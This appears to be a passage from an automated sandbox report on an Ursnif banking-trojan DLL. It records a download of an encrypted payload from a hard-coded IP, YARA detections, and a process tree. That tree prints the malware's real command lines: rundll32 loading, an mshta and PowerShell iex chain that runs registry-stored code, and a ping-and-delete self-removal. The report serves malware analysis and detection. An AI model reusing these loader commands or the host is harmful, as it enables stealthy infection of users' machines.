                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:28:13.619457006 CEST954INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1856
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7d90c22.bin"
                      Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 
7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                      Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo



                      Target ID:1
                      Start time:16:27:32
                      Start date:04/05/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                      Imagebase:0xa60000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:2
                      Start time:16:27:33
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Imagebase:0x1100000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:3
                      Start time:16:27:33
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Imagebase:0x1360000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:9
                      Start time:16:28:17
                      Start date:04/05/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff76df90000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:10
                      Start time:16:28:19
                      Start date:04/05/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff619710000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:11
                      Start time:16:28:20
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff77f440000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:14
                      Start time:16:28:36
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Imagebase:0x7ff6db380000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Target ID:15
                      Start time:16:28:38
                      Start date:04/05/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff79bdc0000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:16
                      Start time:16:28:38
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Imagebase:0x7ff7f0560000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:17
                      Start time:16:28:43
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Imagebase:0x7ff6db380000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:18
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Imagebase:0x7ff7f0560000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:19
                      Start time:16:28:52
                      Start date:04/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff74fc70000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:21
                      Start time:16:29:09
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Imagebase:0x7ff602050000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:22
                      Start time:16:29:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff77f440000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:23
                      Start time:16:29:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff6dcd20000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:24
                      Start time:16:29:23
                      Start date:04/05/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff7b5d10000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      No disassembly